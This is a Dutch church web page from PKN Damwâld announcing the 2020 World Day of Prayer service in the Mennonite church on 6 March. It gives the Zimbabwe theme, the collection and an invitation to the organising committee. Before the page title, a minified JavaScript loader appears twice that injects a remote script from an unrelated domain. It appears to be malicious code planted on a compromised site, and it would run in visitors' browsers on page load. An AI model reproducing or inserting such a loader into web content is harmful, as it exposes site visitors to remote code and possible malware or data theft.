;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Viering Wereldgebedsdag 2020 6 maart - PKN Damwâld

Viering Wereldgebedsdag 2020 6 maart

Gepubliceerd op: zaterdag 15 februari 2020

Nieuw – Nieuw – Nieuw – Nieuw – Nieuw – Nieuw
Wereldgebedsdag commissie Damwoude heeft een facebooksite : www.facebook.com/wgddamwoude kom er gerust eens op kijken.

Ook nodigen wij u uit om samen met ons Wereldgebedsdag 2020 te vieren. Deze wereldgebedsdienst wordt altijd op de eerste vrijdag van maart gevierd en dit jaar is het op 6 maart. De viering vindt plaats in de Fermanje van Damwâld (Doopsgezinde kerk), Doniawei 34, 9104 GM Damwâld  en begint om 19.30 uur.
De muzikale bijdrage word geleverd door: organist/pianist Fedde de Vries.
Wereldgebedsdag heeft ieder jaar weer een ander thema uit een ander land. Dit jaar komt de orde van dienst uit Zimbabwe. Thema van deze bijzonder dienst is: Sta op en ga!

In 1887 riepen Amerikaanse vrouwen op tot een gebedsdag in hun land. Deze oproep is uitgegroeid tot een wereldwijde dag van gebed waaraan door 173 landen wordt deelgenomen, het is dus een lange traditie die we proberen in ere te houden.
Om onze wereldwijde gebeden voor Zimbabwe ook praktisch ten uitvoer te brengen vind er 1 collecte plaats voor diverse projecten in Zimbabwe. Het Nederlands Comité Wereldgebedsdag heeft de projecten gekozen. Deze komen ook op onze site te staan en staan op de liturgie.

De invulling van de dienst word verzorgt door plaatselijke commissie leden van verschillende kerken. Lijkt het u ook leuk om mee te werken aan wereldgebedsdag misschien als commissielid of wilt u meer info? schroom niet en zoek contact. Dit kan ook via Messenger van facebook ( www.facebook.com/wgddamwoude ) of na de viering bij één van de commissieleden.
We hopen u te kunnen verwelkomen op 6 maart 19:30 uur in de Doopsgezinde kerk Damwâld.

Met vriendelijke groet,
Wereldgebedsdagcommissie Damwâld e.o.